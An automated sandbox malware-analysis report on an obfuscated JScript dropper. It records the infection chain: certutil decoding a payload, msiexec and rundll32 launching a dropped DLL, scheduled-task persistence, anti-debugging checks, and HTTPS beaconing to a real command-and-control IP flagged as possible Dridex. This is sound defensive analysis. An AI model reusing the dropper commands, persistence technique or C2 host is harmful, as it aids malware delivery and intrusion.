Windows Analysis Report
1234.js

Overview

General Information

Sample name: 1234.js
Analysis ID: 1541406
MD5: 7dea02845300c31f60e21494c492c870
SHA1: 8ebbbeeb723eea278a343e95d1243577c445845b
SHA256: 9b38cc509b1a4a401275bcb5e896917c842431f9190c417147c35b20b99c4d85
Tags: js, user-pr0xylife

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Found evasive API chain (may stop execution after checking mutex)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential obfuscated javascript found
Sigma detected: WScript or CScript Dropper
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Msiexec Execute Arbitrary DLL
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic

Classification

Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0

Software Vulnerabilities

Source: 1234.js Argument value : ['"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']
Source: 1234.js Argument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 185.161.251.26 443
Source: Joe Sandbox View ASN Name: NTLGB NTLGB
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50002 -> 185.161.251.26:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50003 -> 185.161.251.26:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511C40 LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 11_2_00007FFE1A511C40
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/0
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/I
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/O&=
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/P
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/nfoEx2
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Tasks\Tyrannosaurus Tech.job
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511C40 11_2_00007FFE1A511C40
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5145E0 11_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5168A0 11_2_00007FFE1A5168A0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A512C40 11_2_00007FFE1A512C40
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A513F30 11_2_00007FFE1A513F30
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51CD38 11_2_00007FFE1A51CD38
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A523508 11_2_00007FFE1A523508
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51B310 11_2_00007FFE1A51B310
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5218C0 11_2_00007FFE1A5218C0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51EFB0 11_2_00007FFE1A51EFB0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511990 11_2_00007FFE1A511990
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A515160 11_2_00007FFE1A515160
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A518F68 11_2_00007FFE1A518F68
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A513170 11_2_00007FFE1A513170
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A522578 11_2_00007FFE1A522578
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A522D5C 11_2_00007FFE1A522D5C
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5221C8 11_2_00007FFE1A5221C8
Source: 1234.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal76.evad.winJS@8/4@0/1
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A517740 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize, 11_2_00007FFE1A517740
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\5bba9e40-0e32-4b7f-b39a-667bbc0c2293
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\rad603BF.tmp
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js"
Source: unknown Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: secur32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mstask.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile(encoded_name);var t0=''; [base64-encoded payload omitted]
Source: 1234.js Initial file: High amount of function use 7
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0
Source: 1234.js Array : entropy: 5.18, length: 17418, content: '|LJAAA8AAA''(\x27pm\x27);t0=''Zvcm1hdG|d''ol1hIl0JHh''BIjRVRuAAA''Xb/Xa\x27);t0''ACjMAQABIw''a\x27)
Source: C:\Windows\System32\certutil.exe File created: C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\ProgramData\Tyrannosaurus Tech\Updater.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Tasks\Tyrannosaurus Tech.job

Hooking and other Techniques for Hiding and Protection

Source: unknown Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A515E70 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, 11_2_00007FFE1A515E70
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\certutil.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\ProgramData\Tyrannosaurus Tech\Updater.dll
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511870 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 11_2_00007FFE1A511870
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51E994 IsDebuggerPresent,__crtUnhandledException, 11_2_00007FFE1A51E994
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A52036C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 11_2_00007FFE1A52036C
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51B5A8 GetProcessHeap, 11_2_00007FFE1A51B5A8
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51C538 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00007FFE1A51C538

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 185.161.251.26 443
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51BDA8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_00007FFE1A51BDA8
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5145E0 GetVolumeInformationW,GetModuleHandleW,GetComputerNameW,GetModuleHandleW,GetComputerNameExW,GetModuleHandleW,GetUserNameW,GetModuleHandleW,OpenMutexW,CloseHandle,GetModuleHandleW,GetTickCount,SleepEx, 11_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A515A20 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics, 11_2_00007FFE1A515A20
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid